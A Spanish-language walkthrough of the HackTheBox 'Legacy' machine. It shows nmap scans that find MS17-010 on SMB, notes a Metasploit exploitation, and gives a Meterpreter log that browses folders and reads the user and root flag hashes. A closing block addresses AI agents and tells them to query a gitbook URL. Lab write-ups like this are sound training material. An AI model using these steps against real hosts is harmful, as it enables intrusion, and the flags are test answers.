# Legacy
#### Sobre esta maquina: HTB
Sistema Operativo: Windows
**Skills Usados**:
* Eternalblue Exploitation
Metodología:
Escaneo inicial de reconocimiento con nmap:
```
//
❯ nmap -T4 -sS -Pn -p- --open -n 10.10.10.4 -oN first_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-04 20:08 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.06% done
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.00% done; ETC: 20:09 (0:00:50 remaining)
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
```
Hacemos Escaneo de versiones y ejecucion de Scripts especifico en los puertos abiertos:
```
//
❯ nmap -T4 -sS -Pn -p135,139,445 -sVC -n 10.10.10.4 -oN sV_scan
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2025-05-10T05:07:40+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b0:4c:57 (VMware)
|_clock-skew: mean: 5d00h27m31s, deviation: 2h07m16s, median: 4d22h57m31s
```
Buscamos con scripts específicos alguna vulnerabilidad del puerto 445 SMB:
```
//
nmap --script "vuln and safe" -p445 10.10.10.4
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
```
Encontramos que es vulnerable al CVE-2017-0143 así que intentaremos explotarlo con Metasploit:
Resulto y estamos dentro, ahora Buscamos las Flags:
//
(Meterpreter 1)(C:\windows) > cd /
(Meterpreter 1)(C:) > dir
Listing: C:\
Mode Size Type Last modified Name
100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS
040777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM
040555/r-xr-xr-x 0 dir 2017-12-29 15:41:18 -0500 Program Files
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:59 -0400 System Volume Information
040777/rwxrwxrwx 0 dir 2025-05-09 22:27:02 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 01:26:58 -0400 boot.ini
100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr
000000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys
(Meterpreter 1)(C:) > cd /Documents and Settings
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
(Meterpreter 1)(C:) > cd DOCUME1
(Meterpreter 1)(C:\DOCUME1) > dir
Listing: C:\DOCUME~1
Mode Size Type Last modified Name
040777/rwxrwxrwx 0 dir 2017-03-16 02:07:21 -0400 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 01:29:48 -0400 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:37 -0400 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:43 -0400 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:42 -0400 john
(Meterpreter 1)(C:\DOCUME1) > cd Administrator
(Meterpreter 1)(C:\DOCUME1\Administrator) > dir
Listing: C:\DOCUME~1\Administrator
Mode Size Type Last modified Name
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:29 -0400 Application Data
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:27 -0400 Cookies
040777/rwxrwxrwx 0 dir 2017-03-16 02:18:27 -0400 Desktop
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:32 -0400 Favorites
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:31 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2022-05-28 06:28:03 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2025-05-09 13:22:42 -0400 NTUSER.DAT.LOG
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 NetHood
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 PrintHood
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:31 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:24 -0400 SendTo
040555/r-xr-xr-x 0 dir 2017-03-16 01:20:48 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-03-16 01:28:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2022-05-28 06:28:03 -0400 ntuser.ini
(Meterpreter 1)(C:\DOCUME1\Administrator) > cd Desktop
(Meterpreter 1)(C:\DOCUME1\Administrator\Desktop) > dir
Listing: C:\DOCUME~1\Administrator\Desktop
Mode Size Type Last modified Name
100444/r--r--r-- 32 fil 2017-03-16 02:18:50 -0400 root.txt
(Meterpreter 1)(C:\DOCUME~1\Administrator\Desktop) > cat root.txt
993442d258b0e0ec917cae9e695d5713
Meterpreter 1)(C:\DOCUME1) > dir
Listing: C:\DOCUME1
Mode Size Type Last modified Name
040777/rwxrwxrwx 0 dir 2017-03-16 02:07:21 -0400 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 01:29:48 -0400 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:37 -0400 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:43 -0400 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:42 -0400 john
(Meterpreter 1)(C:\DOCUME1) > cd /all_users
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
(Meterpreter 1)(C:\DOCUME1) > cd john
(Meterpreter 1)(C:\DOCUME1\john) > dir
Listing: C:\DOCUME1\john
Mode Size Type Last modified Name
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:50 -0400 Application Data
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:27 -0400 Cookies
040777/rwxrwxrwx 0 dir 2017-03-16 02:19:33 -0400 Desktop
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:55 -0400 Favorites
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:54 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 02:19:59 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2025-05-09 13:22:42 -0400 NTUSER.DAT.LOG
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 NetHood
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 PrintHood
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:54 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:44 -0400 SendTo
040555/r-xr-xr-x 0 dir 2017-03-16 01:20:48 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-03-16 01:28:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 02:19:59 -0400 ntuser.ini
(Meterpreter 1)(C:\DOCUME1\john) > cd Desktop
(Meterpreter 1)(C:\DOCUME1\john\Desktop) > dir
Listing: C:\DOCUME~1\john\Desktop
Mode Size Type Last modified Name
100444/r--r--r-- 32 fil 2017-03-16 02:19:49 -0400 user.txt
(Meterpreter 1)(C:\DOCUME~1\john\Desktop) > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
Y con la obtencion de las 2 flags ya dariamos por terminada la maquian Legacy.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://henrys-writeups.gitbook.io/owo/maquinas-vulneradas/hackthebox/legacy.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.